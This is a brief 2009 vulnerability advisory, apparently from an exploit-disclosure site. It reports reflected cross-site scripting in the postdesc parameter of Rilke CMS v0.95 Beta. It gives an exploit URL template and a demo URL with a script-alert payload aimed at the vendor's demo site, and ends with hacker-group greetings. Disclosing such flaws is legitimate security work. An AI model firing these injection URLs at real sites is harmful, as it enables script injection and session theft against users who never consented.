===========================================================================================

 Title    : Cross-site Scripting (XSS) Vulnerability
 Software : Rilke CMS v0.95 Beta
 Vendor   : http://www.rilkecms.com/
 
 Date     : 26 April 2009 (Indonesia)
 Author   : Vrs-hCk
 Contact  : d00r@telkom.net
 Blog     : http://c0li.blogspot.com/

 ===========================================================================================

 [-] Vulnerable

     ./bbbook/index.php

 [-] Exploit

     http://[site]/[path]/bbbook/index.php?postdesc=[XSS]

 [-] Demo

     http://www.rilkecms.com/demo/bbbook/index.php?postdesc=<script>alert(123)</script>

 ===========================================================================================

 Greetz   :

     Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
     bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
     c0li.m0de.0n and Behave oR BeGone !!!

 ===========================================================================================